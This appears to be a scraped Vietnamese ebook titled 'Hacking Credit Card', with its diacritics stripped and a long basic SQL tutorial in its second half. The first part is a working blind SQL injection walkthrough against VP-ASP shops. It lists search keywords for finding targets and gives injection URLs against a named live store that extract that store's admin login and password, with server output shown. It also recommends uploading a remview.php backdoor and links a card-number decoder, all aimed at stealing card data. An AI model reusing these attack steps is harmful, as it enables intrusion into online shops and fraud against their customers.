Upload
nguyentrongvinh
View
238
Download
4
Embed Size (px)
Citation preview
8/7/2019 Hacking Credit Card
1/61
------+++-----
Ebook Hacking Credit Card Version 2 Lastest And The End.
Hack ch l hc hi v trao di knng bo mt.
Title : Credit Card Should Stop======Author: hieupcEmail: [email protected]: [email protected]: http://thegioiebook.com
=============================
Sau khi hieupc hon thnh phin bn 1, hieupc cng nghngay n phin bn 2 caEbook Hacking Credit Card. V phin bn Ebook mi ny s hon thin v lp i nhngthiu st tn ti Ebook c.
Tutorial ng ch nht trong Ebook ny.
Hacking Credit Card Sql Blind V.1 (Power by Tieuquainho)C mt bi vit nm trong Ebook Hacking Credit Card version 1, c cch hack gingcch ny nhng c vy l bi vit y nht.Xin gii thiu squa SQL Blind : y l hnh thc khai thc da vo l hng bo mt ca MSSQL, da vo l hng nychng ta p dng nhng on m khai thc v tm kim c thng tin t Database
ca Server. SQL Blind l kiu khai thc d tm tng k t, khi cc bn s dng as cc thao thc k thut hack SQL khc m khng thnh cng th c th tm ni SQLBlind ny c th khai thng nhng b tc , tuy nhin bn mt tt lun c mt khng tt l qu trnh truy vn SQL Blind tn rt nhiu thi gian v cng sc bi v cc bn phitm tng k t mt trong chui cn tm . VD: tm link admin th cc bn phi tm tngch trong chui Database v link admin v ghp chng li thnh 1 chui. Ni nhiu ccbn ri thi lm lin cho chc d hiu.Chun b :- Trnh duyt Web Opera, Mozila Firefor v1.3 hoc loi khc Internet Explorer l ok.Khng nn xi Internet Explorer Hack (^|^)
- 1 ly nc v 1 ci khn lau mt cha chy & lau m hi.Mc tiu:- Tt c cc Phin bn t 5.0 trv trc ca VP-ASP (loi shop tng i nhiu li vnhiu cc cht (^|^))- Cc Tm nhng Shop VP-ASP ny th c th tham kha nhng t kha bn di dngcho vic search trn Google, Yahoo mt site tm kim bt k no .- T Kha :+ shopdisplayproducts.asp?id+ shopaddtocart.asp?catalogid=- Ti cha ra 2 t kha bi v n l nhng mc tiu chnh gip 1 trang tm kim cth tm ra c VP-ASP.
mailto:[email protected]:[email protected]://thegioiebook.com/http://thegioiebook.com/mailto:[email protected]:[email protected]8/7/2019 Hacking Credit Card
2/61
Chng ta bt u hack 1 site demo nhaMc tiu l hxxps://circleathletics.com/ (s dng VP-ASP V5.0)- u tin chng ta tm link admin ca site ny-hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20
and%20left(fieldvalue,1)='a')Microsoft VBScript runtime error '800a000d'Type mismatch: 'clng'/shop/shopproductfeatures.asp, line 139Nh vy c ngha l t kha chng ta a ra (a) khng phi l k tu tin trong chuilink admin, chng ta cht suy nghn link admin thng l shopadmin.asp th vicu lnh sau thay ch a = s-hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s')
Microsoft OLE DB Provider for SQL Server error '80040e07'Syntax error converting the varchar value 'xadminpage' to a column of data type int./shop/shop$db.asp, line 409- Chnh xc l ch S l k tu tien ca link admin ri, chng ta tip tc th nhng chkhc v tip theo-hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='sh')- Ch ch ny nha (fieldvalue,2)='sh')
- C tip tc thay tip vo tm ra link admin. Link admin kt thc = .asp nn khngcn tm xem chui k t c bao nhiu k tuTip theo chng ta tm user + pass adminhxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='a')Microsoft VBScript runtime error '800a000d'Type mismatch: 'clng'/shop/shopproductfeatures.asp, line 139Ko c g ht tip tc nh th
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='c')Microsoft OLE DB Provider for SQL Server error '80040e07'Syntax error converting the varchar value 'circ54' to a column of data type int./shop/shop$db.asp, line 409Hin lun User ra lun site ny b li nng nu nhng site khc cc bn ng no 1 t nhkhi tm link admin l ok hihihxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
8/7/2019 Hacking Credit Card
3/61
ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,2)='ab')y l cch tm k t th 2 , th 3 th them vo (fldusername,3)='abc') dy d m.Chng ta c user admin trn ri circ54 tm pass ca nhxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='a')
Microsoft VBScript runtime error '800a000d'Type mismatch: 'clng'/shop/shopproductfeatures.asp, line 13hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='2')Microsoft OLE DB Provider for SQL Server error '80040e07'Syntax error converting the varchar value '2005HCP' to a column of data type int./shop/shop$db.asp, line 409
Vy l hackc thng ny ri hihi qu d phi khng cc bnHy vng cc bn hiu mnh vit vng lm mong mi ngi thng cmCn y l 1 s tham kha them*************(*** Ti`m link admin ***************************************
%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a')
8/7/2019 Hacking Credit Card
4/61
*************** Ti`m pass ************************************************%20or 1=(select fldpassword from tbluser where fldusername='blue42jh' andleft(fldpassword,1)='a')
8/7/2019 Hacking Credit Card
5/61
fldpassword='" & userpassword & "'"Set rs = myconn.Execute(SQL)if not rs.eof then
CheckSecondpassword rcIf rc=0 then
GetAdminData rselse
closerecordset rs
shopclosedatabase myconnmsg=Secondpasswordmsg & "
"
end ifelse
rs.closeset rs=nothingLocateSupplier
end ifif msg="" thenmsg=LangAdmin01 & "
"
end if
Shopclosedatabase myconnelse
msg=LangAdmin01 & "
"Shopclosedatabase myconn
end ifend ifAdminPageHeaderif msg "" Then
response.write getconfig("xfont") & msg & ""end if%>
8/7/2019 Hacking Credit Card
6/61
0 then
msg="database Open error
" & GetSess("Openerror")elseIf Not rs.EOF Then
setsess "shopadmin" ,request("username")setsess "admintype","supplier"setsess "login" , rs("supplieruserid")setsess("supplierid"),rs("supplierid")
8/7/2019 Hacking Credit Card
7/61
rs.closeset rs=nothingGetUserTables' setsess "usertables",rs("tablesallowed")
LogUser GetSess("ShopAdmin"), "in", myconnShopclosedatabase myconnresponse.redirect "shopadmin1.asp"
else
rs.closeset rs=nothing
end ifend ifend subSub GetUserTablesdim rssql = "select * from tbluser where fldusername='supplier'"Set rs = myconn.Execute(SQL)if err.number>0 then
msg="database Open error
" & GetSess("Openerror")else
If Not rs.EOF Thensetsess "usertables",rs("tablesallowed")setsess "adminmenus",rs("fldaccess")
end ifend ifrs.closeset rs=nothingend subSub Checksecurity (ipassword)
dim tpasswordtpassword=ucase(ipassword)if tpassword="VPASP" or tpassword="ADMIN" thensetsess "security","Yes"
end ifend sub'*******************************************************************' if using second password facility, the validate it'*******************************************************************Sub CheckSecondPassword(rc)dim password
rc=4If secondpassword="" thenrc=0exit sub
end ifpassword=request.form("password2")if password="" then exit subif ucase(password)ucase(secondpassword) then exit subrc=0end sub
8/7/2019 Hacking Credit Card
8/61
%>
Ch ch ch v xanh, y l ni t ci pass th 2 ca shop VPASP. Lc trcnobita cn c suy lun rng ci pass 2 ny c thng VPASP fix v n nm trongdatabase ca shop, nhng ci ny khng ng. T cch t pass 2 th ny, nobita nghrng vic lm pass 2 ny c th do thng webmaster n edit theo hng dn ca VPASP.Cch t pass cc v tr c th khc nhau chng hn:CODE
8/7/2019 Hacking Credit Card
9/61
ordertrackingprodcategoriesprodfeaturesproducts
projectsquantitydiscountsregistrantregistryitemsreviews
searchresultsshipmethodspass_accesssupplierstblaccesstbllog
tbluserCHECK_CONSTRAINTSCOLUMN_DOMAIN_USAGECOLUMN_PRIVILEGESCOLUMNS
CONSTRAINT_COLUMN_USAGECONSTRAINT_TABLE_USAGEDOMAIN_CONSTRAINTSDOMAINSKEY_COLUMN_USAGEREFERENTIAL_CONSTRAINTS
8/7/2019 Hacking Credit Card
10/61
SCHEMATATABLE_CONSTRAINTSTABLE_PRIVILEGESTABLES
VIEW_COLUMN_USAGEVIEW_TABLE_USAGEVIEWSV cch tm kim ny tn rt nhiu cng sc, v phi tm y cc table ca n, m vikiu hack hin nay th l on m table, hoc blind tng k t ca table .Ngi c ngy
cha chc ra 1 shop. Tuy nhin n nay nobita cng cha tm c gii php no tthn cho loi ny .Mong rng qua bi vit ny s gip anh em tm kim pass2 c tt hn .
Bi vit ca hieupc:Theo kinh nghim ca hieupc bit c, mun hackc password th 2 ca shop (Secure Pass) th ch c cch hack local l nhanh v gn nht, ngoi cch hack local nybn c th da theo bi vit kinh nghim ca nobita m ly c pass 2. C v vichack local trnn rt d khi bn c mt host trong tay, v ch cn upload 1 con backdoorln chng hn nh con remview.php l c th hack. Tuy nhin vic ny i hi bn phic kin thc vng v Hosting v DNS. Bn mun bit c shop nm server nobn c th check DNS hoc IP nh v, v t bn ln theo m ng k cho mnh1 host cng host vi shop bn cn ly pass 2. Cn vic hack local v check DNS th nohay hiu r thm v host cc bn c th gh thm cc trang sau y c hng dnc th: http://viethacker.org , http://hvaonline.net v check DNS, kim tra thng tin bn:http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com. Ngoi ra, cn nhiu trang web khc, bn c th ln google.com search.Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip
Ngoi ra cn nhiu Mshell, Backdoor khc c th kim trn google.com hoc qua tranghttp://viethacker.org
Decode CC b m ha: http://rapidshare.de/files/8343810/decodecc.rar.html (pass unrar :thegioiebook.com )
Nhng bi cn phi c nm vng kin thc Hacking Credit Card.
http://viethacker.org/http://hvaonline.net/http://pavietnam.net/http://checkdomain.com/http://whoisc.com/http://check-dns.com/http://php.spb.ru/remview/remview_2003_10_23.ziphttp://viethacker.org/http://rapidshare.de/files/8343810/decodecc.rar.htmlhttp://rapidshare.de/files/8343810/decodecc.rar.htmlhttp://viethacker.org/http://php.spb.ru/remview/remview_2003_10_23.ziphttp://check-dns.com/http://whoisc.com/http://checkdomain.com/http://pavietnam.net/http://hvaonline.net/http://viethacker.org/8/7/2019 Hacking Credit Card
11/61
- Gii thiu v SQL.
Ngun t diendantinhoc.net
~~~~~~~~~~~~~~~~~~~~~~~
SQL l chun ngn ng ANSI truy cp CSDL.
SQL l g?
SQL l vit tt ca Structured Query Language - Ngn ng truy vn cu trc.
SQL cho php bn truy cp vo CSDL.
SQL l mt chun ngn ng ca ANSI.
SQL c th thc thi cc cu truy vn trn CSDL.
SQL c th ly d liu t CSDL.
SQL c th chn d liu mi vo CSDL.
SQL c th xo d liu trong CSDL.
SQL c th sa i d liu hin c trong CSDL.
SQL d hc :-)
SQL l mt chun
SQL l mt chun ca ANSI (American National Standards Institute - Vin tiu chun
quc gia Hoa k) v truy xut cc h thng CSDL. Cc cu lnh SQL c s dng
truy xut v cp nht d liu trong mt CSDL.
SQL hot ng vi hu ht cc chng trnh CSDL nh MS Access, DB2, Informix, MS
SQL Server, Oracle, Sybase v.v...
Lu : Hu ht cc chng trnh CSDL h trSQL u c phn mrng cho SQL ch
hot ng vi chnh chng trnh .
Bng CSDL
Mt CSDL thng bao gm mt hoc nhiu bng (table). Mi bng c xc nh thng
qua mt tn (v d Customers hoc Orders). Bng cha cc mu tin - dng (record - row),
8/7/2019 Hacking Credit Card
12/61
l d liu ca bng.
Di y l mt v d v mt bng c tn l Persons (ngi):
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Pettersen Kari Storgt 20 Stavanger
Bng trn bao gm 3 mu tin (dng), mi mu tin tng ng vi mt ngi, v bn ct
(LastName, FirstName, Address v City).
Cu truy vn SQL
Vi SQL ta c th truy vn CSDL v nhn ly kt qu tr v thng qua cc cu truy vn.
Mt cu truy vn nh sau:
SELECT LastName FROM Persons
S tr v kt qu nh sau:
LastName
Hansen
Svendson
Pettersen
Lu : Mt s h thng CSDL i hi cu lnh SQL phi kt thc bng mt du chm
phy (;). Chng ta s khng dng du chm phy trong bi vit ny.
SQL l ngn ng thao tc d liu (DML - Data Manipulation Language)
SQL l c php thc thi cc cu truy vn. SQL cng bao gm c php cp nht -
8/7/2019 Hacking Credit Card
13/61
sa i, chn thm v xo cc mu tin.
Sau y l danh sch cc lnh v truy vn dng DML ca SQL:
SELECT - ly d liu t mt bng CSDL.
UPDATE - cp nht/sa i d liu trong bng.
DELETE - xo d liu trong bng.
INSERT INTO - thm d liu mi vo bng.
SQL l ngn ngnh ngha d liu (DDL - Data Definition Language)
Phn DDL ca SQL cho php to ra hoc xo cc bng. Chng ta cng c thnh ngha
cc kho (key), ch mc (index), chnh cc lin kt gia cc bng v thit lp cc quan
h rng buc gia cc bng trong CSDL.
Cc lnh DDL quan trng nht ca SQL l:
CREATE TABLE - to ra mt bng mi.
ALTER TABLE - thay i cu trc ca bng.
DROP TABLE - xo mt bng.
CREATE INDEX - to ch mc (kho tm kim - search key).
DROP INDEX - xo ch mc c to.
-Cu lnh SELECT
Cu lnh SELECT c dng truy xut d liu t mt bng. Kt qu tr v di dng
bng c lu trong 1 bng, gi l bng kt qu - result table (cn c gi l tp kt qu
- result set).
C php
C php ca cu lnh SELECT nh sau:
8/7/2019 Hacking Credit Card
14/61
SELECT tn_cc_ct
FROM tn_bng
Truy xut nhiu ct
truy xut cc ct mang tn LastName v FirstName, ta dng mt cu lnh SELECT
nh sau:
SELECT LastName, FirstName FROM Persons
Bng Persons:
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Pettersen Kari Storgt 20 Stavanger
Kt qu tr v:
LastName FirstName
Hansen Ola
Svendson Tove
Pettersen Kari
Truy xut tt c cc ct
truy xut tt c cc ct t bng Persons, ta dng k hiu * thay cho danh sch cc ct:
SELECT * FROM Persons
Kt qu tr v:
LastName - FirstName- Address -City
8/7/2019 Hacking Credit Card
15/61
Hansen - Ola -Timoteivn 10 - Sandnes
Svendson - Tove -Borgvn 23 - Sandnes
Pettersen -Kari -Storgt 20 -Stavanger
Tp kt qu
Kt qu tr v t mt cu truy vn SQL c lu trong 1 tp kt qu (result set). Hu ht
cc h thng chng trnh CSDL cho php duyt qua tp kt qu bng cc hm lp trnh
nh Move-To-First-Record, Get-Record-Content, Move-To-Next-Record v.v...
Du chm phy (;) pha sau cu lnh
Du chm phy l mt cch chun phn cch cc cu lnh SQL nu nh h thng
CSDL cho php nhiu cu lnh SQL c thc thi thng qua mt li gi duy nht.
Cc cu lnh SQL trong bi vit ny u l cc cu lnh n (mi cu lnh l mt v ch
mt lnh SQL). MS Access v MS SQL Server khng i hi phi c du chm phy
ngay sau mi cu lnh SQL, nhng mt s chng trnh CSDL khc c th bt buc bn
phi thm du chm phy sau mi cu lnh SQL (cho d l cu lnh n). Xin nhc
li, trong bi vit ny chng ta s khng dng du chm phy cui cu lnh SQL.
-Mnh WHERE
truy xut d liu trong bng theo cc iu kin no , mt mnh WHERE c th
c thm vo cu lnh SELECT.
C php
C php mnh WHERE trong cu lnh SELECT nh sau:
SELECT tn_ct FROM tn_bng
WHERE tn_ct php_ton gi_tr
Trong mnh WHERE, cc php ton c s dng l
8/7/2019 Hacking Credit Card
16/61
Php ton M t
= So snh bng
So snh khng bng
> Ln hn
< Nh hn
>= Ln hn hoc bng
8/7/2019 Hacking Credit Card
17/61
hin th mt dng nu BT Kiu kin no c tho.
Bng d liu dng trong v d
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Svendson Stephen Kaivn 18 Sandnes
V d 1
S dng AND tm nhng ngi c tn l Tove v h l Svendson:
SELECT * FROM Persons
WHERE FirstName = 'Tove'
AND LastName = 'Svendson'
Kt qu tr v:
LastName FirstName Address City
Svendson Tove Borgvn 23 Sandnes
V d 2
S dng OR tm nhng ngi c tn l Tove hoc h l Svendson:
SELECT * FROM Persons
WHERE firstname = 'Tove'
OR lastname = 'Svendson'
Kt qu tr v:
LastName FirstName Address City
Svendson Tove Borgvn 23 Sandnes
Svendson Stephen Kaivn 18 Sandnes
8/7/2019 Hacking Credit Card
18/61
V d 3
Bn cng c th s dng kt hp AND v OR cng vi du ngoc n to nn cc cu
truy vn phc tp:
SELECT * FROM Persons WHERE
(FirstName = 'Tove' OR FirstName = 'Stephen')
AND LastName = 'Svendson'
Kt qu tr v:
LastName FirstName Address City
Svendson Tove Borgvn 23 Sandnes
Svendson Stephen Kaivn 18 Sandnes
Hansen Ola Timoteivn 10 Sandnes 1951
Svendson Tove Borgvn 23 Sandnes 1978
Svendson Stale Kaivn 18 Sandnes 1980
Pettersen Kari Storgt 20 Stavanger 1960
Kt qu tr v:
LastName FirstName Address City Year
Hansen Ola Timoteivn 10 Sandnes 1951
Svendson Tove Borgvn 23 Sandnes 1978
Svendson Stale Kaivn 18 Sandnes 1980
S dng du nhy
Lu rng v d trn ta s dng hai du nhy n (') bao quanh gi triu kin
'Sandnes'.
8/7/2019 Hacking Credit Card
19/61
SQL s dng du nhy n bao quanh cc gi trdng chui vn bn (text). Nhiu h
CSDL cn cho php s dng du nhy kp ("). Cc gi trdng s khng dng du
nhy bao quanh.
Vi d liu dng chui vn bn:
Cu lnh ng:
SELECT * FROM Persons WHERE FirstName = 'Tove'
Cu lnh sai:
SELECT * FROM Persons WHERE FirstName = Tove
Vi d liu dng s:
Cu lnh ng:
SELECT * FROM Persons WHERE Year > 1965
Cu lnh sai:
SELECT * FROM Persons WHERE Year > '1965'
Php ton iu kin LIKE
Php ton LIKE c dng tm kim mt chui mu vn bn trn mt ct.
C php
C php ca php ton LIKE nh sau:
SELECT tn_ct FROM tn_bng
WHERE tn_ct LIKE mu
Mt k hiu % c thc s dng nh ngha cc k ti din. % c thc t
8/7/2019 Hacking Credit Card
20/61
trc v/hoc sau mu.
S dng LIKE
Cu lnh SQL sau s tr v danh sch nhng ngi c tn bt u bng ch O:
SELECT * FROM Persons
WHERE FirstName LIKE 'O%'
Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt thc bng ch a:
SELECT * FROM Persons
WHERE FirstName LIKE '%a'
Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt cha chui la:
SELECT * FROM Persons
WHERE FirstName LIKE '%la%'
Ton tBETWEEN...AND
ly ra mt min d liu nm gia hai gi tr. Hai gi tr ny c th l s, chui vn bn
hoc ngy thng.
SELECT tn_ct FROM tn_bng
WHERE tn_ct
BETWEEN gi_tr_1 AND gi_tr_2
Bng d liu dng trong v d
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Nordmann Anna Neset 18 Sandnes
Pettersen Kari Storgt 20 Stavanger
8/7/2019 Hacking Credit Card
21/61
Svendson Tove Borgvn 23 Sandnes
V d 1
Tm tt c nhng ngi c h (sp xp theo ABC) nm gia Hansen (tnh lun Hansen)
v Pettersen (khng tnh Pettersen):
SELECT * FROM Persons WHERE LastName
BETWEEN 'Hansen' AND 'Pettersen'
Kt qu tr v:
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Nordmann Anna Neset 18 Sandnes
Lu quan trng: Ton t BETWEEN...END s tr v nhng kt qu khc nhau trn cc
h CSDL khc nhau. Vi mt s h CSDL, ton t BETWEEN...END s tr v cc dng
m c gi tr thc s "nm gia" hai khong gi tr (tc l b qua khng tnh n cc gi
tr trng vi gi tr ca hai u mt). Mt s h CSDL th s tnh lun cc gi tr trng vi
hai u mt. Trong khi mt s h CSDL khc li ch tnh cc gi tr trng vi u mt
th nht m khng tnh u mt th hai (nhv d pha trn). Do vy, bn phi kim
tra li h CSDL m bn ang dng khi s dng ton t BETWEEN...AND.
V d 2
tm nhng ngi c h (sp xp theo ABC) nm ngoi khong hai gi trv d 1, ta
dng thm ton t NOT:
SELECT * FROM Persons WHERE LastName
NOT BETWEEN 'Hansen' AND 'Pettersen'
Kt qu tr v:
8/7/2019 Hacking Credit Card
22/61
LastName FirstName Address City
Pettersen Kari Storgt 20 Stavanger
Svendson Tove Borgvn 23 Sandnes
-------------------------------
Tkho DISTINCT
Cu lnh SELECT s tr v thng tin v cc ct trong bng. Nhng nu chng ta khng
mun ly v cc gi tr trng nhau th sau?
Vi SQL, ta ch cn thm t kho DISTINCT vo cu lnh SELECT theo c php sau:
SELECT DISTINCT tn_ct FROM tn_bng
V d: Tm tt c cc cng ty trong bng t hng
Bng t hng ca ta nh sau:
Company OrderNumber
Sega 3412
W3Schools 2312
Trio 4678
W3Schools 6798
Cu lnh SQL sau:
SELECT Company FROM Orders
S tr v kt qu:
Company
8/7/2019 Hacking Credit Card
23/61
Sega
W3Schools
Trio
W3Schools
Tn cng ty W3Schools xut hin hai ln trong kt qu, i khi y l iu chng ta
khng mun.
V d: Tm tt c cc cng ty khc nhau trong bng t hng
Cu lnh SQL sau:
SELECT DISTINCT Company FROM Orders
S tr v kt qu:
Company
Sega
W3Schools
Trio
Tn cng ty W3Schools by gich xut hin 1 ln, i khi y l iu chng ta mong
mun
--------------------------------
T kho ORDER BY c s dng sp xp kt qu tr v.
Sp xp cc dng
Mnh ORDER BY
c dng sp xp cc dng.
8/7/2019 Hacking Credit Card
24/61
V d bng Orders:
Company OrderNumber
Sega 3412
ABC Shop 5678
W3Schools 2312
W3Schools 6798
V d:
ly danh sch cc cng ty theo th t ch ci (tng dn):
SELECT Company, OrderNumber FROM Orders
ORDER BY Company
Kt qu tr v:
Company OrderNumber
ABC Shop 5678
Sega 3412
W3Schools 6798
W3Schools 2312
V d:
Ly danh sch cc cng ty theo th t ch ci (tng dn) v ho n t hng theo th t
s tng dn:
SELECT Company, OrderNumber FROM Orders
ORDER BY Company, OrderNumber
Kt qu tr v:
8/7/2019 Hacking Credit Card
25/61
Company OrderNumber
ABC Shop 5678
Sega 3412
W3Schools 2312
W3Schools 6798
V d:
Ly danh sch cc cng ty theo th t gim dn:
SELECT Company, OrderNumber FROM Orders
ORDER BY Company DESC
Kt qu tr v:
Company OrderNumber
W3Schools 6798
W3Schools 2312
Sega 3412
ABC Shop 5678
Cu lnh INSERT INTO
Cu lnh INSERT INTO c dng chn dng mi vo bng.
C php:
INSERT INTO tn_bng
VALUES (gi_tr_1, gi_tr_2,....)
Bn cng c th ch r cc ct/trng no cn chn d liu:
INSERT INTO tn_bng (ct_1, ct_2,...)
VALUES (gi_tr_1, gi_tr_2,....)
8/7/2019 Hacking Credit Card
26/61
Chn 1 dng mi
Ta c bng Persons nh sau:
LastName FirstName Address City
Pettersen Kari Storgt 20 Stavanger
Cu lnh SQL sau:
INSERT INTO Persons
VALUES ('Hetland', 'Camilla', 'Hagabakka 24', 'Sandnes')
s tora kt qu trong bng Persons nh sau:
LastName FirstName Address City
Pettersen Kari Storgt 20 Stavanger
Hetland Camilla Hagabakka 24 Stavanger
Chn d liu vo cc ct/trng c th
Vi bng Persons nh trn, cu lnh SQL sau:
INSERT INTO Persons (LastName, Address)
VALUES ('Rasmussen', 'Storgt 67')
S to ra kt qu:
LastName FirstName Address City
Pettersen Kari Storgt 20 Stavanger
Hetland Camilla Hagabakka 24 Stavanger
Rasmussen Storgt 67
8/7/2019 Hacking Credit Card
27/61
--------------------------
Cu lnh UPDATE
Cu lnh UPDATE c s dng cp nht/sa i d liu c trong bng.
C php:
UPDATE tn_bng
SET tn_ct = gi_tr_mi
WHERE tn_ct = gi_tr
V d: bng Person ca ta nh sau:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Rasmussen Storgt 67
Cp nht 1 ct trn 1 dng
Gi s ta mun b xung thm phn tn cho ngi c h l Rasmussen:
UPDATE Person SET FirstName = 'Nina'
WHERE LastName = 'Rasmussen'
Ta s c kt qu nh sau:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Rasmussen Nina Storgt 67
Cp nht nhiu ct trn 1 dng
By gita li mun i tn v a ch:
8/7/2019 Hacking Credit Card
28/61
UPDATE Person
SET Address = 'Stien 12', City = 'Stavanger'
WHERE LastName = 'Rasmussen'
Kt qu s l:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Rasmussen Nina Stien 12 Stavanger
-------------------------
Cu lnh DELETE
c dng xo cc dng ra khi bng.
C php:
DELETE FROM tn_bng
WHERE tn_ct = gi_tr
V d: Bng Person ca ta nh sau:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Rasmussen Nina Stien 12 Stavanger
Xo 1 dng:
Ta xo ngi c tn l Nina Rasmussen:
DELETE FROM Person WHERE LastName = 'Rasmussen'
8/7/2019 Hacking Credit Card
29/61
Kt qu sau khi xo:
LastName FirstName Address City
Nilsen Fred Kirkegt 56 Stavanger
Xo tt c cc dng:
i khi ta mun xo tt c d liu trong bng nhng vn gi li bng cng vi cu trc
v tt c cc thuc tnh ca bng, ta c th dng cu lnh:
DELETE FROM table_name
hoc
DELETE * FROM table_name
SQL c sn lnh m cc dng trong CSDL.
C php ca hm COUNT:
SELECT COUNT(tn_ct) FROM tn_bng
Hm COUNT(*):
Hm COUNT(*) tr v s lng cc dng c chn trong bng.
V d ta c bng Persons nh sau:
Name Age
Hansen, Ola 34
Svendson, Tove 45
Pettersen, Kari 19
8/7/2019 Hacking Credit Card
30/61
Cu lnh sau s tr v s lng cc dng trong bng:
SELECT COUNT(*) FROM Persons
v kt qu tr v s l:
3
Cu lnh sau s tr v s lng nhng ngi ln hn 20 tui:
SELECT COUNT(*) FROM Persons WHERE Age > 20
kt qu tr v s l:
2
Hm COUNT(column):
Hm COUNT(column) s tr v s lng cc dng c gi tr khc NULL ct c ch
nh.
V d ta c bng Persons nh sau:
Name Age
Hansen, Ola 34
Svendson, Tove 45
Pettersen, Kari
Cu lnh sau s tr v s lng nhng ngi m ct Age trong bng khng rng:
SELECT COUNT(Age) FROM Persons
v kt qu tr v s l:
8/7/2019 Hacking Credit Card
31/61
2
Mnh COUNT DISTINCT
Lu : Cc v d di y ch hot ng vi CSDL Oracle v MS SQL Server, khng
hot ng trn MS Access (cha th nhim vi cc h CSDL khc!)
T kho DISTINCT v COUNT c thc dng chung vi nhau m s lng cc
kt qu khng trng nhau.
C php nh sau:
SELECT COUNT(DISTINCT column(s)) FROM table
V d ta c bng Orders nh sau:
Company OrderNumber
Sega 3412
W3Schools 2312
Trio 4678
W3Schools 6798
Cu lnh SQL sau:
SELECT COUNT(DISTINCT Company) FROM Orders
s tr v kt qu l:
3
SQL nng cao
8/7/2019 Hacking Credit Card
32/61
Hm
SQL c sn kh nhiu hm thc hin m v tnh ton.
C php:
C php gi hm trong cu lnh SQL nh sau:
SELECT function(tn_ct) FROM tn_bng
Bng d liu chng ta s dng trong cc v s tip theo:
Name Age
Hansen, Ola 34
Svendson, Tove 45
Pettersen, Kari 19
Hm AVG(column)
Hm AVG tr v gi tr trung bnh tnh theo ct c chnh ca cc dng c chn.
Cc gi tr NULL s khng c xt n khi tnh gi tr trung bnh.
V d:
Cu lnh sau s tnh s tui trung bnh ca nhng ngi c tui trn 20:
SELECT AVG(Age) FROM Persons WHERE Age > 20
kt qu tr v s l:
39.5
8/7/2019 Hacking Credit Card
33/61
Hm MAX(column)
Hm MAX tr v gi tr ln nht trong ct. Cc gi tr NULL s khng c xt n.
V d:
SELECT MAX(Age) FROM Persons
kt qu tr v:
45
Hm MIN(column)
Hm MAX tr v gi tr nh nht trong ct. Cc gi tr NULL s khng c xt n.
V d:
SELECT MIN(Age) FROM Persons
kt qu tr v:
19
Lu : Hm MIN v MAX cng c th p dng cho cc ct c d liu l chui vn bn.
D liu trong ct sc so snh theo th t tng dn ca tin
Hm SUM(column)
Hm SUM tr v tng gi tr ca ct. Cc gi tr NULL s khng c xt n.
V d:
8/7/2019 Hacking Credit Card
34/61
Tm tng s tui ca tt c nhng ngi c trong bng:
SELECT SUM(Age) FROM Persons
kt qu tr v:
98
V d:
Tm tng s tui ca tt c nhng ngi c tui ln hn 20:
SELECT SUM(Age) FROM Persons WHERE Age > 20
kt qu tr v:
79
GROUP BY v HAVING
Cc hm tp hp (v d nh SUM) thng thng cn thm chc nng ca mnh
GROUP BY.
GROUP BY...
Mnh GROUP BY...c thm vo SQL bi v cc hm tp hp (nh SUM) tr v
mt tp hp ca cc gi tr trong ct mi khi chng c gi, v nu khng c GROUP
BY ta khng th no tnh c tng ca cc gi tr theo tng nhm ring l trong ct.
C php ca GROUP BY nh sau:
8/7/2019 Hacking Credit Card
35/61
SELECT tn_ct, SUM(tn_ct) FROM tn_bng GROUP BY tn_ct
V d s dng GROUP BY:
Gi s ta c bng Sales nh sau:
Company Amount
W3Schools 5500
IBM 4500
W3Schools 7100
Cu lnh SQL sau:
SELECT Company, SUM(Amount) FROM Sales
s tr v kt qu:
Company SUM(Amount)
W3Schools 17100
IBM 17100
W3Schools 17100
Kt qu tr vtrn i khi khng phi l ci m ta mong i. Ta thm mnh
GROUP BY vo trong cu lnh SQL:
SELECT Company, SUM(Amount) FROM Sales
GROUP BY Company
v kt qu tr v ln ny s l:
Company SUM(Amount)
W3Schools 12600
IBM 4500
8/7/2019 Hacking Credit Card
36/61
Kt qu ny ng l ci m ta mong mun.
HAVING...
Mnh HAVING...c thm vo SQL v mnh WHERE khng p dng c i
vi cc hm tp hp (nh SUM). Nu khng c HAVING, ta khng th no kim tra
c iu kin vi cc hm tp hp.
C php ca HAVING nh sau:
SELECT tn_ct, SUM(tn_ct) FROM tn_bng
GROUP BY tn_ct
